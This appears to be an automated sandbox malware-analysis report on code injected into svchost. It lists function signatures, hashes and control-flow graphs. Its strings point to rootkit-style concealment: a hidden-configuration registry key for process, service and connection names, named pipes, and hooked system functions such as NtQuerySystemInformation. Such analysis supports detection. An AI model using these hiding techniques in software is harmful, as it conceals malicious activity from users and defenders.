                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 3140674995-0
                                                                                                                                                                                                                                                • Opcode ID: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction ID: daf21aeda4cf789a077210658cbf193bd70b68446a02b37c2ce59d0c9b579d2a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7dccb9baa4819195bc910d82c93c9c94a074eef8dbf9c6936f7d6f4099627f79
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2531507AA05B8096EBA4AFA0E8943EE7370F788704F44443ADB4E57B95DF78C648C710
                                                                                                                                                                                                                                                Function 0000022F4B92D814 Relevance: 9.1, APIs: 6, Instructions: 83COMMON
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 1239891234-0
                                                                                                                                                                                                                                                • Opcode ID: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction ID: d68bef7e754f2b56ef7aacb53c210abe35860cc64dcad5b52c78b87a060c9552
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8ad7b10046b838cd94577b5e5c393489478853aa225d9b7cfe16be4989e4b7af
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B631BC3AA04B8096EBA4DF64E89439E33B0F788754F440136EB9D43BAADF78C145CB00
                                                                                                                                                                                                                                                Function 0000022F4B921630 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157registrymemoryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: SOFTWARE\wzconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
                                                                                                                                                                                                                                                • API String ID: 106492572-440640706
                                                                                                                                                                                                                                                • Opcode ID: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction ID: 07b52497162d2f56f919d96e9523d5bb8b506c1fe4e47d473566f76a78e36670
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c4a1d948d205c8ebe001ad381780c1a24ce9ec132a6c0bfe6eb7dfad1714e50
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8271343AF14A5095EB50AFE2E9A965E2374F749B88F002531DF4D43B6ADF78C464C700
                                                                                                                                                                                                                                                Function 0000022F4B9212BC Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120memoryregistrystringCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 2005889112-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction ID: 73884ab20b5a4ee6f31b479e3b78de45307763ec609ba1613fd3a271b7b88c26
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8c63c14dadc595c9770824a5a8628493091718220e8d249dbd43905e110b320b
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B751273AA04B8496EB94EFA2E66835B77B1F789B89F048134DB490771ADFBCC055C700
                                                                                                                                                                                                                                                Function 0000022F4B921D1C Relevance: 22.8, APIs: 1, Strings: 12, Instructions: 65threadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: CurrentThread$AddressHandleModuleProc
                                                                                                                                                                                                                                                • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                                                                                                                                                                                                                                • API String ID: 4175298099-1975688563
                                                                                                                                                                                                                                                • Opcode ID: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction ID: a2b000bf964a77a2ae0592e655d6e376738b5ff36800a8c6ea03bc55bc4b3563
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f9a2c3f0e0819997d594a213550735c5682f77fff7d415db42708e4ed7ca13a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A331926CD1094AB0FE8CFFE5EA797E66330AB48344F9418339609421639BFC8699D350
                                                                                                                                                                                                                                                Function 0000022F4B92D398 Relevance: 18.1, APIs: 12, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0000022F4B92D3A7
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D3BC
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D3DD
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D40A
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D41B
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D42C
                                                                                                                                                                                                                                                • SetLastError.KERNEL32 ref: 0000022F4B92D447
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D47D
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,00000001,0000022F4B92F23C,?,?,?,?,0000022F4B92C50F,?,?,?,?,?,0000022F4B927AC0), ref: 0000022F4B92D49C
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B92DC3C: HeapAlloc.KERNEL32 ref: 0000022F4B92DC91
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4C4
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B92DCB4: HeapFree.KERNEL32 ref: 0000022F4B92DCCA
                                                                                                                                                                                                                                                  • Part of subcall function 0000022F4B92DCB4: GetLastError.KERNEL32 ref: 0000022F4B92DCD4
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4D5
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,?,?,?,?,0000022F4B930FDB,?,?,?,0000022F4B9309CC,?,?,?,0000022F4B92CDBF), ref: 0000022F4B92D4E6
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value$ErrorLast$Heap$AllocFree
                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                • API String ID: 570795689-0
                                                                                                                                                                                                                                                • Opcode ID: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction ID: e033f97e4525245099d7c372d78e7e6c7bd7c207468dcd0b1050cd078bd67154
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 0311236df13cff9ddc5faef47bd35e239f24ae7eb6a96a8c603fa91771617960
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5641092CE05250A2FADCBFB2D77E36B22725F557A4F184F349B2A066D7DAAC9441D200
                                                                                                                                                                                                                                                Function 0000022F4B92224C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52filethreadCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                                                                                                                                                                                                                                • String ID: \\.\pipe\wzchildproc32$\\.\pipe\wzchildproc64
                                                                                                                                                                                                                                                • API String ID: 2171963597-1908187885
                                                                                                                                                                                                                                                • Opcode ID: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction ID: 8a50a303fa95178e241ab5c4de6dab1416852d232bb1f4af96a468d04f80c525
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 61e9aad5965f0bf4cc9e1225d6c883f067986cfc1e7eceaf874e8f6c664e297a
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: D021603AA1874093FB54AF65F66835A73B0F789BA4F541235DB5902AA9CFBCC149CB00
                                                                                                                                                                                                                                                Function 0000022F4B8F9EF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 390 22f4b8f9ef0-22f4b8f9f57 call 22f4b8fae08 393 22f4b8f9f5d-22f4b8f9f60 390->393 394 22f4b8fa3b8-22f4b8fa3bf call 22f4b8fc0b8 390->394 393->394 395 22f4b8f9f66-22f4b8f9f6c 393->395 397 22f4b8fa03b-22f4b8fa04d 395->397 398 22f4b8f9f72-22f4b8f9f76 395->398 400 22f4b8fa308-22f4b8fa30c 397->400 401 22f4b8fa053-22f4b8fa057 397->401 398->397 402 22f4b8f9f7c-22f4b8f9f87 398->402 405 22f4b8fa30e-22f4b8fa315 400->405 406 22f4b8fa345-22f4b8fa34f call 22f4b8f8004 400->406 401->400 403 22f4b8fa05d-22f4b8fa068 401->403 402->397 404 22f4b8f9f8d-22f4b8f9f92 402->404 403->400 408 22f4b8fa06e-22f4b8fa075 403->408 404->397 409 22f4b8f9f98-22f4b8f9fa2 call 22f4b8f8004 404->409 405->394 410 22f4b8fa31b-22f4b8fa340 call 22f4b8fa3c0 405->410 406->394 416 22f4b8fa351-22f4b8fa370 call 22f4b8f6d50 406->416 412 22f4b8fa07b-22f4b8fa0b6 call 22f4b8f91a0 408->412 413 22f4b8fa239-22f4b8fa245 408->413 409->416 424 22f4b8f9fa8-22f4b8f9fd3 call 22f4b8f8004 * 2 call 22f4b8f94a8 409->424 410->406 412->413 428 22f4b8fa0bc-22f4b8fa0c5 412->428 413->406 417 22f4b8fa24b-22f4b8fa24f 413->417 421 22f4b8fa251-22f4b8fa25d call 22f4b8f9468 417->421 422 22f4b8fa25f-22f4b8fa267 417->422 421->422 437 22f4b8fa280-22f4b8fa288 421->437 422->406 427 22f4b8fa26d-22f4b8fa27a call 22f4b8f9040 422->427 459 22f4b8f9fd5-22f4b8f9fd9 424->459 460 22f4b8f9ff3-22f4b8f9ffd call 22f4b8f8004 424->460 427->406 427->437 433 22f4b8fa0ca-22f4b8fa0fc 428->433 434 22f4b8fa228-22f4b8fa22f 433->434 435 22f4b8fa102-22f4b8fa10e 433->435 434->433 441 22f4b8fa235 434->441 435->434 439 22f4b8fa114-22f4b8fa12d 435->439 442 22f4b8fa28e-22f4b8fa292 437->442 443 22f4b8fa39b-22f4b8fa3b7 call 22f4b8f8004 * 2 call 22f4b8fc018 437->443 447 22f4b8fa225 439->447 448 22f4b8fa133-22f4b8fa178 call 22f4b8f947c * 2 439->448 441->413 444 22f4b8fa2a5 442->444 445 22f4b8fa294-22f4b8fa2a3 call 22f4b8f9468 442->445 443->394 453 22f4b8fa2a8-22f4b8fa2b2 call 22f4b8faea0 444->453 445->453 447->434 472 22f4b8fa17a-22f4b8fa1a0 call 22f4b8f947c call 22f4b8fa630 448->472 473 22f4b8fa1b6-22f4b8fa1bc 448->473 453->406 468 22f4b8fa2b8-22f4b8fa306 call 22f4b8f90d0 call 22f4b8f92d4 453->468 459->460 464 22f4b8f9fdb-22f4b8f9fe6 459->464 460->397 475 22f4b8f9fff-22f4b8fa01f call 22f4b8f8004 * 2 call 22f4b8faea0 460->475 464->460 469 22f4b8f9fe8-22f4b8f9fed 464->469 468->406 469->394 469->460 490 22f4b8fa1c7-22f4b8fa21b call 22f4b8f9e1c 472->490 491 22f4b8fa1a2-22f4b8fa1b4 472->491 479 22f4b8fa1be-22f4b8fa1c2 473->479 480 22f4b8fa220 473->480 494 22f4b8fa036 475->494 495 22f4b8fa021-22f4b8fa02b call 22f4b8faf90 475->495 479->448 480->447 490->480 491->472 491->473 494->397 498 22f4b8fa395-22f4b8fa39a call 22f4b8fc018 495->498 499 22f4b8fa031-22f4b8fa394 call 22f4b8f7c64 call 22f4b8fa9ec call 22f4b8f7e58 495->499 498->443 499->498
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2651743458.0000022F4B8F0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B8F0000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b8f0000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: da2c2a2e52295173ddd7e2504bf9b64235013c0eac6d45ea8b79137591e09048
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B7D1C13AA00B409AEBA0AFA5D64879E37B0F795799F000135EF8957B57EB74D493C700
                                                                                                                                                                                                                                                Function 0000022F4B92AAF0 Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 312COMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 509 22f4b92aaf0-22f4b92ab57 call 22f4b92ba08 512 22f4b92afb8-22f4b92afbf call 22f4b92ccb8 509->512 513 22f4b92ab5d-22f4b92ab60 509->513 513->512 514 22f4b92ab66-22f4b92ab6c 513->514 516 22f4b92ab72-22f4b92ab76 514->516 517 22f4b92ac3b-22f4b92ac4d 514->517 516->517 521 22f4b92ab7c-22f4b92ab87 516->521 519 22f4b92ac53-22f4b92ac57 517->519 520 22f4b92af08-22f4b92af0c 517->520 519->520 522 22f4b92ac5d-22f4b92ac68 519->522 524 22f4b92af45-22f4b92af4f call 22f4b928c04 520->524 525 22f4b92af0e-22f4b92af15 520->525 521->517 523 22f4b92ab8d-22f4b92ab92 521->523 522->520 526 22f4b92ac6e-22f4b92ac75 522->526 523->517 527 22f4b92ab98-22f4b92aba2 call 22f4b928c04 523->527 524->512 538 22f4b92af51-22f4b92af70 call 22f4b927950 524->538 525->512 528 22f4b92af1b-22f4b92af40 call 22f4b92afc0 525->528 530 22f4b92ae39-22f4b92ae45 526->530 531 22f4b92ac7b-22f4b92acb6 call 22f4b929da0 526->531 527->538 543 22f4b92aba8-22f4b92abd3 call 22f4b928c04 * 2 call 22f4b92a0a8 527->543 528->524 530->524 535 22f4b92ae4b-22f4b92ae4f 530->535 531->530 547 22f4b92acbc-22f4b92acc5 531->547 540 22f4b92ae51-22f4b92ae5d call 22f4b92a068 535->540 541 22f4b92ae5f-22f4b92ae67 535->541 540->541 553 22f4b92ae80-22f4b92ae88 540->553 541->524 546 22f4b92ae6d-22f4b92ae7a call 22f4b929c40 541->546 576 22f4b92abd5-22f4b92abd9 543->576 577 22f4b92abf3-22f4b92abfd call 22f4b928c04 543->577 546->524 546->553 551 22f4b92acca-22f4b92acfc 547->551 555 22f4b92ad02-22f4b92ad0e 551->555 556 22f4b92ae28-22f4b92ae2f 551->556 559 22f4b92ae8e-22f4b92ae92 553->559 560 22f4b92af9b-22f4b92afb7 call 22f4b928c04 * 2 call 22f4b92cc18 553->560 555->556 561 22f4b92ad14-22f4b92ad2d 555->561 556->551 558 22f4b92ae35 556->558 558->530 563 22f4b92aea5 559->563 564 22f4b92ae94-22f4b92aea3 call 22f4b92a068 559->564 560->512 566 22f4b92ae25 561->566 567 22f4b92ad33-22f4b92ad78 call 22f4b92a07c * 2 561->567 569 22f4b92aea8-22f4b92aeb2 call 22f4b92baa0 563->569 564->569 566->556 591 22f4b92adb6-22f4b92adbc 567->591 592 22f4b92ad7a-22f4b92ada0 call 22f4b92a07c call 22f4b92b230 567->592 569->524 587 22f4b92aeb8-22f4b92af06 call 22f4b929cd0 call 22f4b929ed4 569->587 576->577 583 22f4b92abdb-22f4b92abe6 576->583 577->517 594 22f4b92abff-22f4b92ac1f call 22f4b928c04 * 2 call 22f4b92baa0 577->594 583->577 588 22f4b92abe8-22f4b92abed 583->588 587->524 588->512 588->577 598 22f4b92ae20 591->598 599 22f4b92adbe-22f4b92adc2 591->599 608 22f4b92ada2-22f4b92adb4 592->608 609 22f4b92adc7-22f4b92ae1b call 22f4b92aa1c 592->609 613 22f4b92ac21-22f4b92ac2b call 22f4b92bb90 594->613 614 22f4b92ac36 594->614 598->566 599->567 608->591 608->592 609->598 617 22f4b92ac31-22f4b92af94 call 22f4b928864 call 22f4b92b5ec call 22f4b928a58 613->617 618 22f4b92af95-22f4b92af9a call 22f4b92cc18 613->618 614->517 617->618 618->560
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: BlockFrameHandler3::Unwind$CatchExecutionHandlerIs_bad_exception_allowedSearchStatestd::bad_alloc::bad_alloc
                                                                                                                                                                                                                                                • String ID: csm$csm$csm
                                                                                                                                                                                                                                                • API String ID: 849930591-393685449
                                                                                                                                                                                                                                                • Opcode ID: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction ID: 1d924de9278305c148e31b0b447630519e86efe1a5e45afe5903e2605341831a
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 568c55b6c37a7b809f3d2baaff0a03158bf13451ebb28e48a05911c62cbff0d2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: BAD15B7BE00B409AFBA8AFA5D65839E77B0F745788F100935EB4957B96CB78C482C700
                                                                                                                                                                                                                                                Function 0000022F4B92F904 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                                • String ID: api-ms-$ext-ms-
                                                                                                                                                                                                                                                • API String ID: 3013587201-537541572
                                                                                                                                                                                                                                                • Opcode ID: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction ID: 2f77668f57cb5e97c049c5cc54ff48c13407bcee6ec94088aabda4b1b494d258
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 78242e2ad1e66ce797da3b321992a6ad1daff7ac6a80aafc19c0109c88dcfca8
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A841F42AF15A1071FA99EF96EA3875733B1B749BE0F0659399F0957386EABCC444C300
                                                                                                                                                                                                                                                Function 0000022F4B92104C Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 99memoryregistryCOMMON
                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                control_flow_graph 658 22f4b92104c-22f4b9210b9 RegQueryInfoKeyW 659 22f4b9210bf-22f4b9210c9 658->659 660 22f4b9211b5-22f4b9211d0 658->660 659->660 661 22f4b9210cf-22f4b92111f RegEnumValueW 659->661 662 22f4b9211a5-22f4b9211af 661->662 663 22f4b921125-22f4b92112a 661->663 662->660 662->661 663->662 664 22f4b92112c-22f4b921135 663->664 665 22f4b921147-22f4b92114c 664->665 666 22f4b921137 664->666 668 22f4b921199-22f4b9211a3 665->668 669 22f4b92114e-22f4b921193 GetProcessHeap call 22f4b936168 GetProcessHeap HeapFree 665->669 667 22f4b92113b-22f4b92113f 666->667 667->662 670 22f4b921141-22f4b921145 667->670 668->662 669->668 670->665 670->667
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                                                                                                                                                • String ID: d
                                                                                                                                                                                                                                                • API String ID: 3743429067-2564639436
                                                                                                                                                                                                                                                • Opcode ID: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction ID: ce9cefd1f562b99d9dbd7395918815e3e2e756b4851a030e7b44f7ae27ca4f18
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4e806da6bf888755fbf7915dbe23be07e0600cef0dd9ac19d63751155720d402
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7B417B36A14B8096E7A4DFA1E55839A77B1F389B88F048139DB8907659DF7CC499CB00
                                                                                                                                                                                                                                                Function 0000022F4B92D5D8 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 54COMMONLIBRARYCODE
                                                                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                • FlsGetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D5F7
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D616
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D63E
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D64F
                                                                                                                                                                                                                                                • FlsSetValue.KERNEL32(?,?,?,0000022F4B92CD4E,?,?,?,?,?,?,?,?,0000022F4B92D50D,?,?,00000001), ref: 0000022F4B92D660
                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                • Source File: 0000000A.00000002.2653068805.0000022F4B920000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022F4B920000, based on PE: true
                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                • Snapshot File: hcaresult_10_2_22f4b920000_svchost.jbxd
                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                • API ID: Value
                                                                                                                                                                                                                                                • String ID: 1%$Y%
                                                                                                                                                                                                                                                • API String ID: 3702945584-1395475152
                                                                                                                                                                                                                                                • Opcode ID: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction ID: c1771cd4d9f66d7745179ee4e672ef5854db48beb73a32ad212ef63d4f1f1538
                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c43ba9056afb091907f0ee91a963f4e74318913cfa62c74dbd7af27afc39a0a2
                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: CC113D28E08250A1FADCBFA2E77A36B22625F547A4F1C4B345A2D467D7DEACC441D640
